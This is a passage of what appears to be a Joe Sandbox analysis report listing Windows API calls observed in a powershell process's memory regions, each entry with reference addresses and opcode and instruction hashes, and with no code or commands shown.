                    • Source File: 0000000B.00000002.1130153069.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_2730000_powershell.jbxd
                    Similarity
                    • API ID: LanguageThread
                    • String ID:
                    • API String ID: 243849632-0
                    • Opcode ID: 6f2904a116ccb4d190c752f7bccb5e4db795f4a702900003711f0549c4690769
                    • Instruction ID: d2d981b3d9a82290b9362bf1c578ff76a186fc5a9ecdb67c6d3a1af4541d60c8
                    • Opcode Fuzzy Hash: 6f2904a116ccb4d190c752f7bccb5e4db795f4a702900003711f0549c4690769
                    • Instruction Fuzzy Hash: 4E216D6140E7C49FD7138B259C54A62BF74AF57620F0980DBD8848F2A3D2696818C772
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • K32EnumProcessModules.KERNEL32(?,00000E9C,2022FD1E,00000000,00000000,00000000,00000000), ref: 01CAAFBE
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1129992349.0000000001CAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CAA000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_1caa000_powershell.jbxd
                    Similarity
                    • API ID: EnumModulesProcess
                    • String ID:
                    • API String ID: 1082081703-0
                    • Opcode ID: 0ad0d06585ac273753980dbfdff76527595603cb36d8a93d9c0d88afaa0894e3
                    • Instruction ID: efb62b2c9b05fa3bb35a53212a9bb943d2572356ce3772b662dc78924be1b814
                    • Opcode Fuzzy Hash: 0ad0d06585ac273753980dbfdff76527595603cb36d8a93d9c0d88afaa0894e3
                    • Instruction Fuzzy Hash: 9311B2B1500204AFEB22CF65DC85B6AFBA8EF44328F14846AE9498B181D775E504CBB1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01CABA7E
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1129992349.0000000001CAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CAA000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_1caa000_powershell.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 7398d41ee5ee3ca19aef3e049e38f5ef923fe6f7f1f15f69b2a261da2ba240ef
                    • Instruction ID: 7697b12b5eb55f6132f94749e1aae0360cba24cdcb9a5fc64299adfffc35bcd0
                    • Opcode Fuzzy Hash: 7398d41ee5ee3ca19aef3e049e38f5ef923fe6f7f1f15f69b2a261da2ba240ef
                    • Instruction Fuzzy Hash: 5A11B471505380AFDB22CF65DC85B52FFF4EF06210F08849EE9858B622D375E818CB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ReadFile.KERNELBASE(?,00000E9C,2022FD1E,00000000,00000000,00000000,00000000), ref: 027308E5
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1130153069.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_2730000_powershell.jbxd
                    Similarity
                    • API ID: FileRead
                    • String ID:
                    • API String ID: 2738559852-0
                    • Opcode ID: 221580fa078948df9d848a602875beaf7102f707a625509e0b7d93e8a36460a7
                    • Instruction ID: 75745727c932e0faa486cf469e3c792bc543e6685d8d72eb09645e0098de7c92
                    • Opcode Fuzzy Hash: 221580fa078948df9d848a602875beaf7102f707a625509e0b7d93e8a36460a7
                    • Instruction Fuzzy Hash: C011E771500204AFEB21CF64EC81F5AFBA8EF44324F14855AEE499A142C375A504CBB2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SetErrorMode.KERNELBASE(?), ref: 01CAA39C
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1129992349.0000000001CAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CAA000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_1caa000_powershell.jbxd
                    Similarity
                    • API ID: ErrorMode
                    • String ID:
                    • API String ID: 2340568224-0
                    • Opcode ID: cf43a40aaf7e2bf6869b2c8ea2e66e1bfac7a5d6702d68cbfe82d663bc983429
                    • Instruction ID: bc7d8fca43fd46d734c93d0b6a54147771ffa567e6147baa2e4a42dfa27435cb
                    • Opcode Fuzzy Hash: cf43a40aaf7e2bf6869b2c8ea2e66e1bfac7a5d6702d68cbfe82d663bc983429
                    • Instruction Fuzzy Hash: 2B114C714093C4AFDB128B25DC54A62FFB4DF47624F1880DAEDC58B263D2A5A908DB72
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0273129B
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1130153069.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_2730000_powershell.jbxd
                    Similarity
                    • API ID: AttributeConsoleText
                    • String ID:
                    • API String ID: 646522457-0
                    • Opcode ID: 5c6a66c2cc27f28550006e20ef6d3e7ea8608405cb4aa9b5c7b4f35b4576e387
                    • Instruction ID: 034347de73662a7aa71bd7ccf8a7f478f2473159de5cf8a191cf7b64d5dde008
                    • Opcode Fuzzy Hash: 5c6a66c2cc27f28550006e20ef6d3e7ea8608405cb4aa9b5c7b4f35b4576e387
                    • Instruction Fuzzy Hash: EE1194725093849FDB118F65DC85B56FFA4EF46220F0884EFED498B262D274A404CB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • UnmapViewOfFile.KERNELBASE(?), ref: 02730640
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1130153069.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_2730000_powershell.jbxd
                    Similarity
                    • API ID: FileUnmapView
                    • String ID:
                    • API String ID: 2564024751-0
                    • Opcode ID: c1a7073d2da72d50631e0d7a0367bd4d5088e311f9960333df4aa135a2fbb42b
                    • Instruction ID: 43be05b35d865f19e3f6ef7e012e1546b2eb18ce2fb71fc90af97ea95ab83bba
                    • Opcode Fuzzy Hash: c1a7073d2da72d50631e0d7a0367bd4d5088e311f9960333df4aa135a2fbb42b
                    • Instruction Fuzzy Hash: ED11A0755097C09FDB128B25DC95B52FFB4DF47224F0880EBED858B263D264A908CB62
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01CAAB1A
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1129992349.0000000001CAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CAA000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_1caa000_powershell.jbxd
                    Similarity
                    • API ID: LookupPrivilegeValue
                    • String ID:
                    • API String ID: 3899507212-0
                    • Opcode ID: e7cf367a1d1c83557035b28b2c2df3de1533b4f3c74266b292bb75eea8dc78bb
                    • Instruction ID: f8c3b5bca2a8ce43049d3becd4f9e96594ac0d523f0ecdcbde61fd82f6984886
                    • Opcode Fuzzy Hash: e7cf367a1d1c83557035b28b2c2df3de1533b4f3c74266b292bb75eea8dc78bb
                    • Instruction Fuzzy Hash: 7F115EB16002469FEB21CF69EC85B56FBE8EF05224F0884AADD49CB642D775E504CA71
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetConsoleOutputCP.KERNEL32 ref: 01CAAA71
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1129992349.0000000001CAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CAA000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_1caa000_powershell.jbxd
                    Similarity
                    • API ID: ConsoleOutput
                    • String ID:
                    • API String ID: 3985236979-0
                    • Opcode ID: b4e254cb5a8e4fcd081811ad595d353da14116683639f638c1d3cbc2e99de326
                    • Instruction ID: 670adfaa013fa878dedb346784ea33f63bd32bd078b219511289d92dfbf41351
                    • Opcode Fuzzy Hash: b4e254cb5a8e4fcd081811ad595d353da14116683639f638c1d3cbc2e99de326
                    • Instruction Fuzzy Hash: F311917540D7C09FD7128B65DC85A92BFB4EF07224F0980DBD9858F263D268A909CB72
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetSystemInfo.KERNELBASE(?), ref: 0273099C
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1130153069.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_2730000_powershell.jbxd
                    Similarity
                    • API ID: InfoSystem
                    • String ID:
                    • API String ID: 31276548-0
                    • Opcode ID: 0390792e804d8e88d113bd85dacfd020740aa42fcac3270da9ec083c5ca55e74
                    • Instruction ID: 4d9ed37a69e7206004d532b4543b7d476753e981065123c5dac6e758193eba79
                    • Opcode Fuzzy Hash: 0390792e804d8e88d113bd85dacfd020740aa42fcac3270da9ec083c5ca55e74
                    • Instruction Fuzzy Hash: 0B118F754097C45FD713CB65DC95B92FFB4EF07324F0980DAD9844B263D265A908CB62
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetFileType.KERNELBASE(?,00000E9C,2022FD1E,00000000,00000000,00000000,00000000), ref: 02730819
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1130153069.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_2730000_powershell.jbxd
                    Similarity
                    • API ID: FileType
                    • String ID:
                    • API String ID: 3081899298-0
                    • Opcode ID: b2df7434801ced5d0a606c1cae640fd05e69fa25aa6719b666df22da2c0cef9c
                    • Instruction ID: a980d7af4417bf06c9d410cd1f1dfbd2bdad5a5c41da6f7ca06b3a6c03217b8d
                    • Opcode Fuzzy Hash: b2df7434801ced5d0a606c1cae640fd05e69fa25aa6719b666df22da2c0cef9c
                    • Instruction Fuzzy Hash: 8D01F971500244AFE711CF61EC86FA6F79CDF45724F14C09AEE089B242D378A504CAB2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1130153069.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_2730000_powershell.jbxd
                    Similarity
                    • API ID: ConsoleWrite
                    • String ID:
                    • API String ID: 2657657451-0
                    • Opcode ID: 17db7f9a4db93c3b51bcaa7011b791746697726c5a2641c8feb47e290361a3be
                    • Instruction ID: 31d31626acc93effb9b146a91d6358ae0533b673d8865930824df97d252cb110
                    • Opcode Fuzzy Hash: 17db7f9a4db93c3b51bcaa7011b791746697726c5a2641c8feb47e290361a3be
                    • Instruction Fuzzy Hash: 1B11ADB16003409FEF21CF65DC85B66FBA4EF05224F0884AEED498BA52D375E414CB62
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetLogicalDrives.KERNELBASE ref: 01CAABC9
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1129992349.0000000001CAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CAA000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_1caa000_powershell.jbxd
                    Similarity
                    • API ID: DrivesLogical
                    • String ID:
                    • API String ID: 999431828-0
                    • Opcode ID: 0c9256663c880d2b8529bc60caa8f76ad5e746cb7f6cacdf474e9596a1514e38
                    • Instruction ID: 83077d35319a0777db2d039d85913420bff167c2a9c84aa260cdf668c5fe5918
                    • Opcode Fuzzy Hash: 0c9256663c880d2b8529bc60caa8f76ad5e746cb7f6cacdf474e9596a1514e38
                    • Instruction Fuzzy Hash: F111CEB54093809FDB11CF65EC85B82BFA8EB42224F0980EBDD498F253D274A508CB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01CABA7E
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1129992349.0000000001CAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CAA000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_1caa000_powershell.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: fb1e7f96255a8d3cc3d8a89e08d43d2781518e3adda81aecea0700be4d6d3f79
                    • Instruction ID: cfce3f201db8e741b83c9146c6a8c82a5cf3786e6a885d75c48b5402d21b90a3
                    • Opcode Fuzzy Hash: fb1e7f96255a8d3cc3d8a89e08d43d2781518e3adda81aecea0700be4d6d3f79
                    • Instruction Fuzzy Hash: CC118E71500745DFDB21CFA5D885B52FBE4EF08225F0884AADE898A612D375E914CB62
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • EnumWindows.USER32(?,00000E9C,?,?), ref: 01CAA23E
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1129992349.0000000001CAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CAA000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_1caa000_powershell.jbxd
                    Similarity
                    • API ID: EnumWindows
                    • String ID:
                    • API String ID: 1129996299-0
                    • Opcode ID: 5dd96f930e45c223e0ee32a6f7f877f109431ecf4195de5a28f07023d06b5f7e
                    • Instruction ID: 4fe2db5a2e33fbb2b86f4ade320e46e8ec5ed662775e58c20e961b29bd5face4
                    • Opcode Fuzzy Hash: 5dd96f930e45c223e0ee32a6f7f877f109431ecf4195de5a28f07023d06b5f7e
                    • Instruction Fuzzy Hash: C8018471900200AFD310DF66DC86B66FBA8FB88A24F24816AED089B741D375F515CBE6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0273109E
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1130153069.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_2730000_powershell.jbxd
                    Similarity
                    • API ID: InformationVolume
                    • String ID:
                    • API String ID: 2039140958-0
                    • Opcode ID: 61af728eda5792c6c9694092b8d1a3921639570432cc3b0a6d20723fc06e4310
                    • Instruction ID: 6ddd934822dada9bd8c8fbcb5442e759b56bf395db9b0c4b8f0c1590f71eb1fa
                    • Opcode Fuzzy Hash: 61af728eda5792c6c9694092b8d1a3921639570432cc3b0a6d20723fc06e4310
                    • Instruction Fuzzy Hash: AE0188719002006FD350DF65DC46B66FBA4FB84724F24815ADD089B741D375F515CBE6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SetConsoleTitleW.KERNEL32(?), ref: 027301D0
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1130153069.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_2730000_powershell.jbxd
                    Similarity
                    • API ID: ConsoleTitle
                    • String ID:
                    • API String ID: 3358957663-0
                    • Opcode ID: ae9eb5ec5af9517e8764ad1f2769e20f52212805f6230bf53be769a0c0cbed12
                    • Instruction ID: a5f2c6ee33529451240d54cafeaf7b26b84fd2c7a06a2ee89ed027cf7da612a2
                    • Opcode Fuzzy Hash: ae9eb5ec5af9517e8764ad1f2769e20f52212805f6230bf53be769a0c0cbed12
                    • Instruction Fuzzy Hash: 3001B1716003448FEB11CF66DC8576AFBA8EF01224F18C4ABDC49CB642D375E504CB62
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetConsoleScreenBufferInfo.KERNEL32 ref: 01CABB2F
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1129992349.0000000001CAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CAA000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_1caa000_powershell.jbxd
                    Similarity
                    • API ID: BufferConsoleInfoScreen
                    • String ID:
                    • API String ID: 3437242342-0
                    • Opcode ID: ae37ba4d9cdea28af2481fe5f0956a61e6c992e55cf4f5f1c1c503a8ac303e82
                    • Instruction ID: c4d63e4019c9cec7eb6585ce378958483c80a09421e20d164467050b5ff6cddd
                    • Opcode Fuzzy Hash: ae37ba4d9cdea28af2481fe5f0956a61e6c992e55cf4f5f1c1c503a8ac303e82
                    • Instruction Fuzzy Hash: 77014271500241CFEB21CF69EC85766FBA4EF05228F08C4AFDD498B616D375E904CB62
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0273129B
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1130153069.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_2730000_powershell.jbxd
                    Similarity
                    • API ID: AttributeConsoleText
                    • String ID:
                    • API String ID: 646522457-0
                    • Opcode ID: 4c255fc21baf944370d6ae4547ceeb0ef9acd55d8b7a39c42ec330a8b81ea89e
                    • Instruction ID: 57b5cfb4b49c4b84cd3946581f38de4463e3191a73cb2210d209927a714e9785
                    • Opcode Fuzzy Hash: 4c255fc21baf944370d6ae4547ceeb0ef9acd55d8b7a39c42ec330a8b81ea89e
                    • Instruction Fuzzy Hash: F501DF766002849FEB11CF65D8857A6FBA4FF05224F08C4AFDD49CB652D375A404CF62
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VerLanguageNameW.KERNELBASE(?,00000E9C,?,?), ref: 01CAA94A
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1129992349.0000000001CAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CAA000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_1caa000_powershell.jbxd
                    Similarity
                    • API ID: LanguageName
                    • String ID:
                    • API String ID: 2060303382-0
                    • Opcode ID: f996ccb5caf72027fc0e59e80928440a4f8bd889480bbf4b10bffc9daa7ee462
                    • Instruction ID: 69e18e54ce6e5f6f7146bfb89d8ddc0e2dc62c280bf7de834a876450f570795b
                    • Opcode Fuzzy Hash: f996ccb5caf72027fc0e59e80928440a4f8bd889480bbf4b10bffc9daa7ee462
                    • Instruction Fuzzy Hash: 88016272900600ABD350DF56DC86B26FBA4FB88B24F24815AED085B741D375F525CBE6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetDriveTypeW.KERNELBASE(?), ref: 02730FB0
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1130153069.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_2730000_powershell.jbxd
                    Similarity
                    • API ID: DriveType
                    • String ID:
                    • API String ID: 338552980-0
                    • Opcode ID: 954d4c4995b19bde55837a09212f8b6d5ad82f60ddea9ff2b2c759934c773db8
                    • Instruction ID: d0323acedd2f2eb24fa0242dc6bbb7ac1c8bccf763127c74f18be643f5d9abde
                    • Opcode Fuzzy Hash: 954d4c4995b19bde55837a09212f8b6d5ad82f60ddea9ff2b2c759934c773db8
                    • Instruction Fuzzy Hash: 5101A2715003459FEB10CF65D885B66FBE4EF06624F18C4AADD48CF206D375E504CBA2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02730502
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1130153069.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_2730000_powershell.jbxd
                    Similarity
                    • API ID: FolderPath
                    • String ID:
                    • API String ID: 1514166925-0
                    • Opcode ID: dea770f2f4675e4b8bbd1a8ac5f90f32a820e376047772be944d7c48d42c3647
                    • Instruction ID: 3ec2d16730258af795d9195e36c19f8331d6f1936f9a338f72ec75d7a1d495b5
                    • Opcode Fuzzy Hash: dea770f2f4675e4b8bbd1a8ac5f90f32a820e376047772be944d7c48d42c3647
                    • Instruction Fuzzy Hash: 8F016272900600ABD350DF56DC86F26FBA4FB88B24F24815AED085B741D375F525CBE6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • UnmapViewOfFile.KERNELBASE(?), ref: 02730640
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1130153069.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_2730000_powershell.jbxd
                    Similarity
                    • API ID: FileUnmapView
                    • String ID:
                    • API String ID: 2564024751-0
                    • Opcode ID: 021181e8b6b6378e92a24f2ff33869367e3e44385757b4828b01f70491a9f67f
                    • Instruction ID: 42d29a27d0c465628b6a9e117261562982b74274e913bbc2cb2a0b7227e702c0
                    • Opcode Fuzzy Hash: 021181e8b6b6378e92a24f2ff33869367e3e44385757b4828b01f70491a9f67f
                    • Instruction Fuzzy Hash: D5014474500244CFEB108F15DC85721FBA4EF41224F08C0AADC098B316C3B5E404CAA2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetLogicalDrives.KERNELBASE ref: 01CAABC9
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1129992349.0000000001CAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CAA000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_1caa000_powershell.jbxd
                    Similarity
                    • API ID: DrivesLogical
                    • String ID:
                    • API String ID: 999431828-0
                    • Opcode ID: 6d5a08946f6c9920bbf507f92e7dad2d92e7269a68c5af5068d6fa4a76e7926b
                    • Instruction ID: 46629d1c099965a32ce01e8378fb6ba027471c91702f509d18d4dad46640b86b
                    • Opcode Fuzzy Hash: 6d5a08946f6c9920bbf507f92e7dad2d92e7269a68c5af5068d6fa4a76e7926b
                    • Instruction Fuzzy Hash: 2501F470504284DFEB11CF6AE885752FBA4EF05228F58C4ABCD098F606D379E504CBA2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SetThreadUILanguage.KERNEL32(?), ref: 02731148
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1130153069.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_2730000_powershell.jbxd
                    Similarity
                    • API ID: LanguageThread
                    • String ID:
                    • API String ID: 243849632-0
                    • Opcode ID: f0b7c95b37299d18119ae199cf905e538b398b89f2b2b829cd36694550859b55
                    • Instruction ID: 428677f199f82bb95b1fe1ae7cd4febdab30a67c601188bd72cc99c792453f69
                    • Opcode Fuzzy Hash: f0b7c95b37299d18119ae199cf905e538b398b89f2b2b829cd36694550859b55
                    • Instruction Fuzzy Hash: EDF0FF745002449FEB21CF15E8867A2FBA4EF05624F48C0AACD4C4B316D3BAA544CAA2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SetErrorMode.KERNELBASE(?), ref: 01CAA39C
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1129992349.0000000001CAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CAA000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_1caa000_powershell.jbxd
                    Similarity
                    • API ID: ErrorMode
                    • String ID:
                    • API String ID: 2340568224-0
                    • Opcode ID: 56d66ef7441a3f3ef1bd3f4bae6538676f844b4ace94e95fa9b97a03cb7b6723
                    • Instruction ID: ac8fd536197c4371c4fa4d8f8a9b14690f6fb0256a289ece20ff949a2b967d5d
                    • Opcode Fuzzy Hash: 56d66ef7441a3f3ef1bd3f4bae6538676f844b4ace94e95fa9b97a03cb7b6723
                    • Instruction Fuzzy Hash: 22F0C274505345DFEB21CF56D885725FBA0EF05728F58C09ADD494B312D3BAE508CAA2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetConsoleOutputCP.KERNEL32 ref: 01CAAA71
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1129992349.0000000001CAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CAA000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_1caa000_powershell.jbxd
                    Similarity
                    • API ID: ConsoleOutput
                    • String ID:
                    • API String ID: 3985236979-0
                    • Opcode ID: 66aea90c349d3b4582289ba96998fe47dc649de8500fc09bad92d094f1bb56cc
                    • Instruction ID: ea4db9a95f513427e023d299b4b6ad5e3aa9ebc0ea69649a37cd26adb3291a4c
                    • Opcode Fuzzy Hash: 66aea90c349d3b4582289ba96998fe47dc649de8500fc09bad92d094f1bb56cc
                    • Instruction Fuzzy Hash: 40F0C231500685CFDB11CF55D986761FBE0EF05228F58C09ADD094B256D3B9EA04CFA2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CloseHandle.KERNELBASE(?), ref: 01CAA9C8
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1129992349.0000000001CAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CAA000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_1caa000_powershell.jbxd
                    Similarity
                    • API ID: CloseHandle
                    • String ID:
                    • API String ID: 2962429428-0
                    • Opcode ID: 2b100d4feef5708abfd4abbb05294cf7c67fca66922c77ff0e0a43d195fb989f
                    • Instruction ID: 27694281ba509a87643f64700d91623b63022e9323d1ecfcf6f1586ed561cf0f
                    • Opcode Fuzzy Hash: 2b100d4feef5708abfd4abbb05294cf7c67fca66922c77ff0e0a43d195fb989f
                    • Instruction Fuzzy Hash: AE11A3715093C09FD712CF25DC95B52BFA4DF46224F0980EBED858B263D274A908CB71
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CloseHandle.KERNELBASE(?), ref: 01CAA9C8
                    Memory Dump Source
                    • Source File: 0000000B.00000002.1129992349.0000000001CAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CAA000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_1caa000_powershell.jbxd
                    Similarity
                    • API ID: CloseHandle
                    • String ID:
                    • API String ID: 2962429428-0
                    • Opcode ID: 8a928bc6bdf03756d2122c9948f06d4b2a6f30d540ef9e865ae7033ce1365b68
                    • Instruction ID: 6a4716879dd3e79a397bc365b1cc582f2932804bc29820ecffb083b3e6e482cf
                    • Opcode Fuzzy Hash: 8a928bc6bdf03756d2122c9948f06d4b2a6f30d540ef9e865ae7033ce1365b68
                    • Instruction Fuzzy Hash: 5201F775500285DFDB11CF65D885766FBE4DF05228F18C0ABDD098B202D375E904CF62
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000B.00000002.1130369450.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_2b00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2b24590528b44733170292086484eb0e55c210fd49d3c5198b5b48fc6553e265
                    • Instruction ID: 70779f9386b857175dca67a2a40ea83ee9af1f252d28c93972ee55c059894e53
                    • Opcode Fuzzy Hash: 2b24590528b44733170292086484eb0e55c210fd49d3c5198b5b48fc6553e265
                    • Instruction Fuzzy Hash: 3611022260E3C05FD303477458A6A957FB58FA3214B0F80EBC495CF6A3CA284C0BC762
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000B.00000002.1130369450.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_2b00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 008218d4eba50be6e1ad0a578d1bb7aa1f748b4d0fe3e7818a393c0952462809
                    • Instruction ID: 55e68ea9ed28161fb1ce5e7710f875dba166619ec4b312e5eea227df62ba3961
                    • Opcode Fuzzy Hash: 008218d4eba50be6e1ad0a578d1bb7aa1f748b4d0fe3e7818a393c0952462809
                    • Instruction Fuzzy Hash: D3F03A2560E3D05FC71393B9A865A567FB58F87114B0A84EBD098CF6A3DA285C0B8362
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000B.00000002.1130178756.00000000027E0000.00000040.00000020.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_27e0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 95333ecc66c1caae601b890b90356290c2be265ce26cb507caa618b31445f69f
                    • Instruction ID: e985a08942e4e8f71d68f7c9cdd3c266f8d45717a57120771bcde2e16c5a1eba
                    • Opcode Fuzzy Hash: 95333ecc66c1caae601b890b90356290c2be265ce26cb507caa618b31445f69f
                    • Instruction Fuzzy Hash: A20186765097806FD7128B15AC41863FFB8DE8B520719C4AFEC898B612D269B909CB72
